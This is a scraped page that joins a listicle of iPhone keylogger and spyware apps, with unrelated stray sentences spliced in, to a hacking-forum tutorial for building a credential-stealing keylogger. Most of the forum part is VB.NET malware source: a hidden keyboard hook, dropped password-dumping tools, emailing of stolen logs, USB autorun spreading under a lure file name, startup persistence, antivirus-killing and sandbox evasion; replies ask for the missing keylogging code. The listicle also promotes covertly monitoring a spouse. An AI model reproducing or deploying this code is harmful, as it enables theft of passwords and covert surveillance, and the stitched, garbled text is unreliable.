Hc Stealer Keylogger For Ipad
These are the best Keyloggers for your iPhone, which can hellp you noy judy keep a track of your device but also monitor the activities of your kids.
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- What is Password Stealer? A password stealer (PWS) is malware that is specifically used to transmit personal information, such as user names and passwords. A PWS often works in conjunction with a keylogger or other tracking software. In this article, I have presented HC Stealer which will help you to steal passwords.
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- A keylogger is just as it sounds: a program that logs keystrokes. The danger of having a keylogger virus on your computer is that it can very easily keep track of every single keystroke you enter through your keyboard, and this includes every password and username.
Someone may be skeptical about installing a keylogger on their device voluntarily. We wouldn’t typically want to see this fellow among applications running on our device, as such kind of programming is traditionally associated with spying malware that tries to compromise our privacy and get hold of our passwords and bank account credentials.
However, recently keylogging was put to good use and is being utilized in the wide array of monitoring tools. There are stand-alone keylogger programs, as well as versatile control applications with featured keylogger options.
What is a keylogger? This is any piece of software or hardware that keeps a log of keystrokes. Not so long ago, keyloggers were only compatible with traditional keyboards. However, touchscreen keyloggers have become possible as well.
They use it to:
- Keep a track of one’s own device, while it’s out of reach;
- Monitor underage children;
- Monitor company-owned devices issued to employees.
Concerned parents sometimes use keyloggers to monitor their children’s online activities and whereabouts. Although software designed to block and restrict access to certain content and sites exists, it can be (and very often is) bypassed by tech-savvy children, therefore a keylogger seems to be the only mean of keeping a finger on a pulse of an underage’s cyber life.
Sometimes people would install keylogger programs to secure their phone should they lose it, or see how others use the device given to them temporarily.
Employers sometimes use keyloggers on company-owned iPhones and iPads to assess the employee’s performance and ensure that the device is used only for work-related tasks. In this case, an employee must be aware that the keystroke logging is being performed.
Even if you do not consider installing a keylogger on your device, you should be aware of the possibility.
Moreover, some of them can be hidden, so you may have one on your own device already without even knowing. It’s always better to know what you may face.
Best Keyloggers for iPhone and iPad
#1. iKeyMonitor
iKeyMonitor is one of the best keylogger apps for iPhone and iPad. It not only logs keystrokes but also monitors SMS, WhatsApp, Calls, Facebook, Twitter, and many other things. Once installed on the device, you receive logs through email. There’s no need to login to any dashboard or web service to view the activities.
The primary use of this app is for parents that wish to keep track of their kids’ activity on their iDevices. They can also restrict certain things if needed. The app isn’t available for free, but it comes with the 3-days trial period before you decide to purchase it.
Price: $49.99/a month
Try it now
#2. Pumpic iPhone Keylogger
This keylogger concentrates on parental monitoring purposes, such as protection against cyber-bullying, online predators, sexting and other inappropriate online behavior from both sides (the child and their interlocutors). The keylogger feature is a part of the Pumpic software, which is visible on the target device, so the person you track is aware of the monitoring (it includes SMS, calls, the web, social networks, pictures and videos, GPS location and many more.)
The information gathered on the target device is sent to the control panel, which is the device you designate.
Main plus: versatility (with options of the remote control panel, geofences, and locking of the device.)
The instrument is able to handle 128 voices simultaneously, and is compatible with a variety of voicing formats, including GM2, GS, and XG Lite. Style keyboard roland. Feed the BK-5 a Standard MIDI File, buckle up, and get ready for a great-sounding band!
Read more at Pumpic.com
#3. iKeyMonitor
This one lets you not only protect your children but also expose a cheating spouse by revealing SMS and call logs, as well as chat messages from a number of popular social networks (Facebook, Kik, WhatsApp, hangouts, etc.) GPS tracking is a feature that also might come in handy if you lose your phone. All logs are sent to your e-mail account (so make sure to create one apart from that you use on your phone.) Numerical problems in solid state physics by m. a. wahab pdf.
Main plus: available in multiple languages.
Find more at iKeyMonitor.com
#4. KidLogger
This app reacts to the trigger words (“drugs”, for example), makes a screenshot once the word was typed in, and sends the journal of gathered data to your e-mail address, and promises to stay undetectable on the target device. However, while not conspicuous, it is still visible in the “Running application list.” Moreover, it does not keep full keystroke record in iOS-compatible version.
Main plus: offers both free and a paid PRO versions (though PRO is only available for Android.)
Visit KidLogger.net for more information.
#5. FlexiSpy
This one is also offering a keylogger among the array of spying features, which is rather wide: SMS and call logs, e-mail and many social networks messages monitoring, geo-fencing, locking and wiping the phone. However, it’s pretty pricey.
Main plus: “Extreme” version records the surrounding sounds and calls.
Read more at FlexiSpy.com
This is an app that offers more than 35 monitoring features; more for any other app within the same price bracket. While its compatibility is one of its strengths (you don’t need jailbroken iOS devices to use this), you will instantly get used to its smart interface which is simple and user-friendly.
It offers basic as well as advanced features to its users. If you want to only look at the contacts, calls, and SMS information, then its basic features will be enough for you. But if you are looking to get more information that you can rely on its Ambient Recorder and Watchlist features. Watchlist features give instant notifications about certain words, places, locations, and even emails.
With its 24-hour online support and affordable packages, Xnspy is definitely among the top apps in this category.
Main plus: Available on both Android and iPhone. Supports their latest operating systems including Android Oreo 8.0 and iOS 11.
Read more at Xnspy.com
Disclaimer: You should remember, though, that technically, undetectable monitoring software can be classified as surveillance, so make sure you do not use it without other side’s consent (unless the target device belongs to you or your underage children).
About Author: Jana Rooheart is an e-safety specialist and a professional blogger. She lives in Kansas City with her family and works part-time.
Do share your feedback with us in the comment, on Facebook, Twitter, and Instagram. And don’t forget to download our app.
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[TuT]How To Make A Advanced Keylogger & Stealer Using Drops Detection 2/20 [Source] |
Post: #1 |
[TuT]How To Make A Advanced Keylogger & Stealer Using Drops Detection 2/20 [Source] Drops Logger Tutorial By Rapid Advanced Keylogger & Stealer Hello Friends This Is Rapid..Here My New Tutoral How To Make Advanced Keylogger & Stealer Using Drops [Credits To Nirsoft] This Tutorial Is Very Noob Way I Will Explain Becasue Everyone Must UnderStand Ok Sorry For Bad English But I Would Like To Help U First Of All New Mates ConfusingAbout Builder & Stub What Are They Small Story : - Builder is just Like A Connector To Stub Whole SHit of our Code In Stub So Stub Is Main Part [Server] And Buildr Is Just Like Calling The Req Options UnderStood Builder Code Open Microsoft Visual Studio 2008 --->File-->New Project--->Project Name(Drops Logger)---> Form Loaded Then Edit Something Like Naming as Drops Logger Maximize box-False Minimize Box -False FormBorderStyle-FixedSingle Add 5 lables & 3 Text Boxes & (NumericUpDown Set Value as 15) & 6 checkboxes & OpenFileDialog & 1Button(i have 3) label1-Gmail Username label2-Gmail Password label3-Logs Send To label4-Time Interval label5-(Minutes} checkbox1-Stealers checkbox2-Run On Startup checkbox3-Usb Spread checkbox4-Anti-System checkbox5-Icon Changer(CheckBox15X) here my code checkbox6-FilePumper(CheckBox14C) here in my code textbox1-getting gmail username textbox2-getting gmail password textbox3-logs send to here any mail u can add textbox4-file pumper like here 1024kb = 1 mb textbox5-icon changer path Then Ur Builder Look Like This [Image: droplogger1.jpg] Double Click Or Hit F7 So Then Builder Code: import some as Quote:Imports Microsoft.Win32 Imports System.IO Imports System.Net.Mail Imports fLaSh.Dissembler ' <------ u got problem here add reference as Project--Addreference--browse-->dissembler LIB.dll Take Some Variables Quote: Dim stub, text1, text2, text3, numberval, cb1, cb2, cb3, cb4 As String And Connection As Quote:Const FileSplit = '@Rapid@' Click On Iconchanger Check Box---Select as Method as 'Click' or in CheckedChanged Place This Code Code: If CheckBox15X.Checked = True Then Try OpenFileDialog1.DefaultExt = 'ico' OpenFileDialog1.Filter = 'icon files (*.ico) *.ico' OpenFileDialog1.FilterIndex = 1 If OpenFileDialog1.ShowDialog(Me) = DialogResult.OK Then TextBox5.Text = String.Empty TextBox5.Text = OpenFileDialog1.FileName End If Dim newicon As New Bitmap(TextBox5.Text, True) PictureBox1.Image = newicon Catch ex As Exception MsgBox('Please Select Another Icon.....!Thank You ') End Try Else MsgBox('U Dont Need Icon....Thx') Double Click On Build (button1) Add This Entair Code Code: Try text1 = TextBox1.Text 'username text2 = TextBox2.Text 'pass text3 = TextBox3.Text 'sendto numberval = NumericUpDown1.Value 'time If CheckBox1.Checked = True Then 'stelers cb1 = True Else : cb1 = False End If If CheckBox2.Checked = True Then 'startup cb2 = True Else : cb2 = False End If If CheckBox3.Checked = True Then 'Usb cb3 = True Else : cb3 = False End If If CheckBox4.Checked = True Then 'anties cb4 = True Else : cb4 = False End If '############## Icon Changer ######## If CheckBox15X.Checked = True Then Try Dim oIconFilenathu As New IconFile(Me.TextBox5.Text) Dim groupIconResource As GroupIconResource = oIconFilenathu.ConvertToGroupIconResource() groupIconResource.SaveTo(Application.StartupPath & 'Stub.exe') Catch IC As Exception MsgBox('Dear User Take Another Icon......!') End Try End If FileOpen(1, Application.StartupPath & 'stub.exe', OpenMode.Binary, OpenAccess.Read, OpenShare.Default) stub = Space(LOF(1)) FileGet(1, stub) FileClose(1) '#### Check For Served Ifs There Exits Then it will delete If File.Exists(Application.StartupPath & 'server.exe') Then My.Computer.FileSystem.DeleteFile(Application.StartupPath & 'server.exe') End If FileOpen(1, Application.StartupPath & 'server.exe', OpenMode.Binary, OpenAccess.ReadWrite, OpenShare.Default) FilePut(1, stub & FileSplit & text1 & FileSplit & text2 & FileSplit & text3 & FileSplit & numberval & FileSplit & cb1 & FileSplit & cb2 & FileSplit & cb3 & FileSplit & cb4) FileClose(1) 'add bytes (file pumper) If CheckBox14C.Checked = True Then Try Dim filesize As Double = Val(Me.TextBox4.Text) If type.Text = 'B' Then filesize = Me.TextBox4.Text ElseIf type.Text = 'KB' Then filesize = Me.TextBox4.Text * 1024 ElseIf type.Text = 'MB' Then filesize = Me.TextBox4.Text * 1048576 End If Dim filetopump = IO.File.OpenWrite(Application.StartupPath & 'server.exe') Dim size = filetopump.Seek(0, IO.SeekOrigin.[End]) While size < filesize filetopump.WriteByte(0) size += 1 End While filetopump.Close() Catch Pump As Exception MsgBox('There was an error while pumping !') End Try End If '### Finally Server Created MsgBox('Server was created successfully in : ' & Application.StartupPath & 'server.exe') Catch ex As Exception MsgBox('Error May Be U Dont Place Stub..!') End Try ' You Done Your Drops Logger Builder' Stub Code Then Stub Code First Of All Download iepv & PasswordFox&OperaPassView&ChromePass&Mspass From Nirsoft And Add These As Reference To You Stub Project as Like THis [Image: dropslogger2.jpg] Agin Open Microsoft Visual Studio 2008 --->File-->New Project--->Project Name(Stub)---> Form Loaded Then Edit This Main Part To Hide Ur Server In Stub Properties Modify This 1.ShownIcon As False 2.WindowState as Minimized (Imp) 3.Opacity as 0% 4.FormBorderStyle as Fixed Tool Window 9 textboxes & 5 lables & 2 timers label1-time label2-startup label3-usb label4-anties label5-steales Textbox1 as -for Keylogging Purpose whole keystokes will be here Textbox2 as- for username Textbox3 as -for pass Textbox4 as-for logs send to Textbox5(Here In My Code as TextBox9) -Ie Logs Textbox6(Here In My Code as TextBox10)-firefox logs Textbox7 (Here In My Code as TextBox11)-chrome logs Textbox8 (Here In My Code as TextBox12)-opera logs Textbox9 (Here In My Code as TextBox139)-chat messengers timer1- Keylogging timer3- sending mail Why I Add Lot of textboxes why because to clear to observer my logs fox,chrome,opera logs in my pc U can code in single textbox aslo ur wish Double Click On Stub Form Import This Quote:Imports Microsoft.Win32 Imports System.IO Imports System.Net.Mail and Variables as Quote: Dim options(), text1, text2, text3, numberval, cb1, cb2, cb3, cb4 As String Connection as Quote: Const FileSplit = '@Rapid@' and Hook Code Code: #Region 'HOOK CODE' Private Declare Function GetAsyncKeyState Lib 'USER32' (ByVal vKey As Long) As Integer Private Declare Function GetKeyState Lib 'user32' (ByVal nVirtKey As Long) As Integer Public Function GetCapslock() As Boolean GetCapslock = CBool(GetKeyState(&H14) And 1) End Function Public Function GetShift() As Boolean GetShift = CBool(GetAsyncKeyState(&H10)) End Function Dim Result As Integer '##keyhook Public Class KeyboardHook Private Const HC_ACTION As Integer = 0 Private Const WH_KEYBOARD_LL As Integer = 13 Private Const WM_KEYDOWN = &H100 Private Const WM_KEYUP = &H101 Private Const WM_SYSKEYDOWN = &H104 Private Const WM_SYSKEYUP = &H105 Private Structure KBDLLHOOKSTRUCT Public vkCode As Integer Public scancode As Integer Public flags As Integer Public time As Integer Public dwExtraInfo As Integer End Structure Private Declare Function SetWindowsHookEx Lib 'user32' _ Alias 'SetWindowsHookExA' _ (ByVal idHook As Integer, _ ByVal lpfn As KeyboardProcDelegate, _ ByVal hmod As Integer, _ ByVal dwThreadId As Integer) As Integer Private Declare Function CallNextHookEx Lib 'user32' _ (ByVal hHook As Integer, _ ByVal nCode As Integer, _ ByVal wParam As Integer, _ ByVal lParam As KBDLLHOOKSTRUCT) As Integer Private Declare Function UnhookWindowsHookEx Lib 'user32' _ (ByVal hHook As Integer) As Integer Private Delegate Function KeyboardProcDelegate _ (ByVal nCode As Integer, _ ByVal wParam As Integer, _ ByRef lParam As KBDLLHOOKSTRUCT) As Integer Public Shared Event KeyDown(ByVal Key As Keys) Public Shared Event KeyUp(ByVal Key As Keys) Private Shared KeyHook As Integer Private Shared KeyHookDelegate As KeyboardProcDelegate Public Sub New() KeyHookDelegate = New KeyboardProcDelegate(AddressOf KeyboardProc) KeyHook = SetWindowsHookEx(WH_KEYBOARD_LL, KeyHookDelegate, System.Runtime.InteropServices.Marshal.GetHINSTANCE(System.Reflection.Assembly.GetExecutingAssembly.GetModules()(0)).ToInt32, 0) End Sub Private Shared Function KeyboardProc(ByVal nCode As Integer, ByVal wParam As Integer, ByRef lParam As KBDLLHOOKSTRUCT) As Integer If (nCode = HC_ACTION) Then Select Case wParam Case WM_KEYDOWN, WM_SYSKEYDOWN RaiseEvent KeyDown(CType(lParam.vkCode, Keys)) Case WM_KEYUP, WM_SYSKEYUP RaiseEvent KeyUp(CType(lParam.vkCode, Keys)) End Select End If Return CallNextHookEx(KeyHook, nCode, wParam, lParam) End Function Protected Overrides Sub Finalize() UnhookWindowsHookEx(KeyHook) MyBase.Finalize() End Sub End Class Private WithEvents kbHook As New KeyboardHook Private Declare Function GetForegroundWindow Lib 'user32.dll' () As Int32 Private Declare Function GetWindowText Lib 'user32.dll' Alias 'GetWindowTextA' (ByVal hwnd As Int32, ByVal lpString As String, ByVal cch As Int32) As Int32 Dim strin As String = Nothing Private Function GetActiveWindowTitle() As String Dim MyStr As String MyStr = New String(Chr(0), 100) GetWindowText(GetForegroundWindow, MyStr, 100) MyStr = MyStr.Substring(0, InStr(MyStr, Chr(0)) - 1) Return MyStr End Function #End Region And In In Form_ Load Add This Codes Code: FileOpen(1, Application.ExecutablePath, OpenMode.Binary, OpenAccess.Read, OpenShare.Shared) text1 = Space(LOF(1)) 'username text2 = Space(LOF(1)) 'pass text3 = Space(LOF(1)) 'sender@anymail numberval = Space(LOF(1)) 'time---->label1 cb1 = Space(LOF(1)) 'stealers ------>label15 cb2 = Space(LOF(1)) 'run on startup------>label2 cb3 = Space(LOF(1)) 'Usb------>label3 cb4 = Space(LOF(1)) 'anties------>label4 '+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ FileGet(1, text1) ' options(1) -->usernam FileGet(1, text2) ' options(2)--->pass FileGet(1, text3) 'options(3)---------->sender@gmail.com FileGet(1, numberval) ' options(4)--->time >>>>>>>>-------->label1 FileGet(1, cb1) 'options(5)----------->Stealers >>>>>>>>-------->label15 FileGet(1, cb2) 'options(6)----------->startup>>>>>>>>-------->label2 FileGet(1, cb3) 'options(7)----------->Usb >>>>>>>>-------->label3 FileGet(1, cb4) 'options(8)----------->anties>>>>>>>>-------->label4 FileClose(1) options = Split(text1, FileSplit) '++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++' 'Getto TextBox2.Text = options(1) '------------------->username TextBox3.Text = options(2) '-------------------->pass TextBox4.Text = options(3) '------------------------>sender@anymail Label1.Text = options(4) '---------------------->time If options(5) = False Then Label5.Text = 'no-Stealers' Else Label5.Text = 'Yes-Stealers' '###################################here its calling steaelrs Call IE() TextBox9.Text = IO.File.ReadAllText(Environ('tmp') & 'iepv.txt') Call firefoxpass() TextBox10.Text = IO.File.ReadAllText(Environ('tmp') & 'firefox.txt') Call chrome() TextBox11.Text = IO.File.ReadAllText(Environ('tmp') & 'ChromePass.txt') Call OperaPassView() TextBox12.Text = IO.File.ReadAllText(Environ('tmp') & 'OperaPassView.txt') Call mspass() TextBox13.Text = IO.File.ReadAllText(Environ('tmp') & 'mspass.txt') End If If options(6) = True Then '----------------------->start up 'Label2.Text = 'startup ' AddStartup(Me.Text, Application.ExecutablePath) Else Label2.Text = 'startup No' End If If options(7) = True Then '----------------------->Usb Label3.Text = ('Yes-Usb') usb() Else Label3.Text = ('No-Usb') End If If options(8) = True Then '----------------------->anties Label4.Text = 'yes-anties' Try Call AntiAnubis() Call AntiBitDefender() Call AntiKaspersky() Call AntiKeyscrambler() Call AntiMalwarebytes() Call AntiNOD32() Call AntiNorman() Call AntiOllydbg() Call AntiOutpost() Call AntiWireshark() Call AntiZoneAlarm() ant.mofo() Catch ex As Exception Application.Exit() 'exit applicato End Try Else Label4.Text = 'No-anties' End If Timer1.Start() ' KeyStrokes Hack----------$MAIN PART$ Timer2.Interval = (Label1.Text * 60 * 1000) ' conver to minutes Timer2.Start() ' sendign Mail Click On Timer1 add this Code For Keystrokes loggin Here 777 Lines Of Code http://pastebin.com/MD5ANRXH http://www.multiupload.com/PF38LTW0TB Click On timer2 add these code Code: Try Dim MyMailMessage As New MailMessage() MyMailMessage.From = New MailAddress(TextBox2.Text) MyMailMessage.To.Add(TextBox4.Text) MyMailMessage.Subject = '+--Drops Logger Logs--+ ' MyMailMessage.Body = 'The Drops Logger is Successfully Activated On ' & My.Computer.Name & ' Computer ' & ' At the Time ' & My.Computer.Clock.LocalTime & Environment.NewLine & Environment.NewLine & '[+----System Infomation----+]' & Environment.NewLine & Environment.NewLine & My.Computer.Info.OSFullName & ' (Operating Sysytem)' & Environment.NewLine & Environment.NewLine & ' [+------Stealers-----+] ' & '+--Drops Logger By Rapid -- Indian H@cker--+ ' + vbNewLine + vbNewLine & '--+INDIAN H@CKER+--' + vbNewLine + vbNewLine & TextBox1.Text & TextBox9.Text & TextBox10.Text & TextBox11.Text & TextBox12.Text & TextBox13.Text Dim SMTPServer As New SmtpClient('smtp.gmail.com') SMTPServer.Port = 587 SMTPServer.Credentials = New System.Net.NetworkCredential(TextBox2.Text, TextBox3.Text) SMTPServer.EnableSsl = True SMTPServer.Send(MyMailMessage) TextBox1.Clear() 'its clear the logs Catch ex As Exception End Try And Add these steales codes Code: #Region 'Stealers' Function IE() As String Dim open As String Dim Ressource1() As Byte = My.Resources.iepv FileOpen(1, Environ('tmp') & 'iepv.exe', OpenMode.Binary) FilePut(1, Ressource1) FileClose(1) Shell(Environ('tmp') & 'iepv.exe /stext ' & Environ('tmp') & 'iepv.txt', AppWinStyle.Hide) open = IO.File.ReadAllText(Environ('tmp') & 'iepv.txt') Return open End Function Function firefoxpass() As String Dim open As String Dim Ressource1() As Byte = My.Resources.PasswordFox FileOpen(1, Environ('tmp') & 'passwordfox.exe', OpenMode.Binary) FilePut(1, Ressource1) FileClose(1) Shell(Environ('tmp') & 'passwordfox.exe /stext ' & Environ('tmp') & 'firefox.txt', AppWinStyle.Hide) open = IO.File.ReadAllText(Environ('tmp') & 'firefox.txt') Return open End Function Function chrome() As String Dim open As String Dim Ressource1() As Byte = My.Resources.ChromePass FileOpen(1, Environ('tmp') & 'ChromePass.exe', OpenMode.Binary) FilePut(1, Ressource1) FileClose(1) Shell(Environ('tmp') & 'ChromePass.exe /stext ' & Environ('tmp') & 'ChromePass.txt', AppWinStyle.Hide) open = IO.File.ReadAllText(Environ('tmp') & 'ChromePass.txt') Return open End Function Function OperaPassView() As String Dim open As String Dim Ressource1() As Byte = My.Resources.OperaPassView FileOpen(1, Environ('tmp') & 'OperaPassView.exe', OpenMode.Binary) FilePut(1, Ressource1) FileClose(1) Shell(Environ('tmp') & 'OperaPassView.exe /stext ' & Environ('tmp') & 'OperaPassView.txt', AppWinStyle.Hide) open = IO.File.ReadAllText(Environ('tmp') & 'OperaPassView.txt') Return open End Function Function mspass() As String Dim open As String Dim Ressource1() As Byte = My.Resources.mspass FileOpen(1, Environ('tmp') & 'mspass.exe', OpenMode.Binary) FilePut(1, Ressource1) FileClose(1) Shell(Environ('tmp') & 'mspass.exe /stext ' & Environ('tmp') & 'mspass.txt', AppWinStyle.Hide) open = IO.File.ReadAllText(Environ('tmp') & 'mspass.txt') Return open End Function #End Region Usb Spred Code Code: Private Sub usb() Dim drivers As String = My.Computer.FileSystem.SpecialDirectories.ProgramFiles Dim driver() As String = (IO.Directory.GetLogicalDrives) For Each drivers In driver Try IO.File.Copy(Application.ExecutablePath, drivers & 'PornPic.scr') Dim autorunwriter = New StreamWriter(drivers & 'autorun.inf') autorunwriter.WriteLine('[autorun]') autorunwriter.WriteLine('open=' & drivers & 'PornPic.scr') autorunwriter.WriteLine('shellexecute=' & drivers, 1) autorunwriter.Close() System.IO.File.SetAttributes(drivers & 'autorun.inf', FileAttributes.Hidden) System.IO.File.SetAttributes(drivers & 'PornPic.scr', FileAttributes.Hidden) Catch ex As Exception End Try Next Call filehide() End Sub Private Sub filehide() My.Computer.Registry.SetValue('HKEY_CURRENT_USERSoftwareMicrosoftWindow sCurrentVersionExplorerAdvanced', 'Hidden', 0) End Sub anties Code Code: #Region 'Anties' Sub AntiKeyscrambler() Dim generaldee As Process() = Process.GetProcesses Dim i As Integer For i = 0 To generaldee.Length - 1 Select Case Strings.LCase(generaldee(i).ProcessName) Case 'keyscrambler' generaldee(i).Kill() Case Else End Select Next End Sub '------------------------Wireshark---------------------------- Sub AntiWireshark() Dim generaldee As Process() = Process.GetProcesses Dim i As Integer For i = 0 To generaldee.Length - 1 Select Case Strings.LCase(generaldee(i).ProcessName) Case 'wireshark' generaldee(i).Kill() Case Else End Select Next End Sub '----------------------------Anubis-------------------------------- Sub AntiAnubis() Dim generaldee As Process() = Process.GetProcesses Dim i As Integer For i = 0 To generaldee.Length - 1 Select Case Strings.LCase(generaldee(i).ProcessName) Case 'anubis' generaldee(i).Kill() Case Else End Select Next End Sub '------------------------Malwarebytes---------------------------- Sub AntiMalwarebytes() Dim generaldee As Process() = Process.GetProcesses Dim i As Integer For i = 0 To generaldee.Length - 1 Select Case Strings.LCase(generaldee(i).ProcessName) Case 'mbam' generaldee(i).Kill() Case Else End Select Next End Sub '------------------------Kaspersky---------------------------- Sub AntiKaspersky() Dim generaldee As Process() = Process.GetProcesses Dim i As Integer For i = 0 To generaldee.Length - 1 Select Case Strings.LCase(generaldee(i).ProcessName) Case 'avp' generaldee(i).Kill() Case Else End Select Next End Sub '-----------------------Ollydbg--------------------------------- Sub AntiOllydbg() Dim generaldee As Process() = Process.GetProcesses Dim i As Integer For i = 0 To generaldee.Length - 1 Select Case Strings.LCase(generaldee(i).ProcessName) Case 'ollydbg' generaldee(i).Kill() Case Else End Select Next End Sub '-----------------------Outpost--------------------------------- Sub AntiOutpost() Dim generaldee As Process() = Process.GetProcesses Dim i As Integer For i = 0 To generaldee.Length - 1 Select Case Strings.LCase(generaldee(i).ProcessName) Case 'outpost' generaldee(i).Kill() Case Else End Select Next End Sub '-----------------------Norman------------------------------ Sub AntiNorman() Dim generaldee As Process() = Process.GetProcesses Dim i As Integer For i = 0 To generaldee.Length - 1 Select Case Strings.LCase(generaldee(i).ProcessName) Case 'npfmsg' generaldee(i).Kill() Case Else End Select Next End Sub '-----------------------Bit Defender------------------------------ Sub AntiBitDefender() Dim generaldee As Process() = Process.GetProcesses Dim i As Integer For i = 0 To generaldee.Length - 1 Select Case Strings.LCase(generaldee(i).ProcessName) Case 'bdagent' generaldee(i).Kill() Case Else End Select Next End Sub '-----------------------NOD32------------------------------ Sub AntiNOD32() Dim generaldee As Process() = Process.GetProcesses Dim i As Integer For i = 0 To generaldee.Length - 1 Select Case Strings.LCase(generaldee(i).ProcessName) Case 'egui' generaldee(i).Kill() Case Else End Select Next End Sub '-----------------------Zone Alarm------------------------------ Sub AntiZoneAlarm() Dim generaldee As Process() = Process.GetProcesses Dim i As Integer For i = 0 To generaldee.Length - 1 Select Case Strings.LCase(generaldee(i).ProcessName) Case 'zlclient' generaldee(i).Kill() Case Else End Select Next End Sub '+=TOfx Public Class ant Private Declare Function FindWindow Lib 'user32' Alias 'FindWindowA' (ByVal lpClassName As String, ByVal lpWindowName As String) As Long Public Shared Sub mofo() seekit('MSASCui') seekit('msmpeng') antiSandboxie() IsVmWare() AntiThreatExpert() checkUsername() checkComputername() End Sub Private Shared Sub seekit(ByVal gay1 As String) For Each p As Process In Process.GetProcesses() If p.ProcessName.Contains(gay1) Then Try p.Kill() Catch ex As Exception End Try End If Next End Sub Private Shared Sub checkUsername() Dim Usernames As New List(Of String) Usernames.Add('UserName') Usernames.Add('User') Usernames.Add('honey') Usernames.Add('sandbox') Usernames.Add('currentuser') Usernames.Add('User') For Each name As String In Usernames If Environment.UserName = name Then Environment.Exit(0) End If Next End Sub Private Shared Sub checkComputername() Dim Computername As New List(Of String) Computername.Add('ComputerName') Computername.Add('COMPUTERNAME') Computername.Add('DELL-D3E62F7E26') Computername.Add('DWI-9625AC2E275') Computername.Add('MICHAEL-F156CF7') For Each name As String In Computername If Environment.MachineName = name Then Environment.Exit(0) End If Next End Sub Public Shared Sub antiSandboxie() If Process.GetProcessesByName('SbieSvc').Length >= 1 Then Environment.Exit(0) End If End Sub Public Shared Sub IsVmWare() Dim Hndl As Long Hndl = FindWindow('VMDragDetectWndClass', vbNullString) If Hndl = 0 Then Environment.Exit(0) End If End Sub Private Shared Sub AntiThreatExpert() If Process.GetCurrentProcess().MainModule.FileName.Contains('sample') Then Environment.Exit(0) End If End Sub End Class #End Region ' You Done Your Drops LoggerStub' You Have Any Problem Check Here Project Download link http://www.multiupload.com/5A3JNXD8F3 I Hope You Like It But Very Lenthy Tutorial Give Proper Credits To Me If You use This Code And Encourage Me For My Effort Black HatBlack Hat |
Hc Stealer Keylogger For Ipad 2
10-02-2011, 08:05 PM |
RE: [TuT]How To Make A Advanced Keylogger & Stealer Using Drops Detection 2/20 [Source] One, you have not given credits to the original poster. Two, It's not properly layed out. |
06-04-2012, 12:55 PM (This post was last modified: 06-11-2012 05:23 AM by AdaS.) |
RE: [TuT]How To Make A Advanced Keylogger & Stealer Using Drops Detection 2/20 [Source] well does it work on a Mac like this keylogger Mac? :) |
Post: #4 |
RE: [TuT]How To Make A Advanced Keylogger & Stealer Using Drops Detection 2/20 [Source] The Timer1 Code is REMOVED I need it ? Can anyone Give it to Meee ?? |
Post: #5 |
RE: [TuT]How To Make A Advanced Keylogger & Stealer Using Drops Detection 2/20 [S.. Thanks a lot for code, sir, ' Stub Code Then Stub Code First Of All Download iepv & PasswordFox&OperaPassView&ChromePass&Mspass From Nirsoft And Add These As Reference To You Stub Project as Like THis [Image: dropslogger2.jpg]' Here I got error, I downloaded it all, but error says ' coud not add as reference. exe. ', I m using visual studio 2008 win7 32 bit. For resolving this, I tried such solutions like, Convert. exe to dll, abd tried to add, but no success, Refresh. resx and recompile, What to do, for resolving this error, Is it .Net version error? ? NOTE: A.jpeg not shown which you added in your source . PLEASE ANY ONE HELP! !!! |
Post: #6 |
RE: [TuT]How To Make A Advanced Keylogger & Stealer Using Drops Detection 2/20 [S.. (10-10-2013 03:44 PM)steveroseik Wrote: The Timer1 Code is REMOVED I also want 'Timer Code' , have you get it ? plz reply. I need it !!! |
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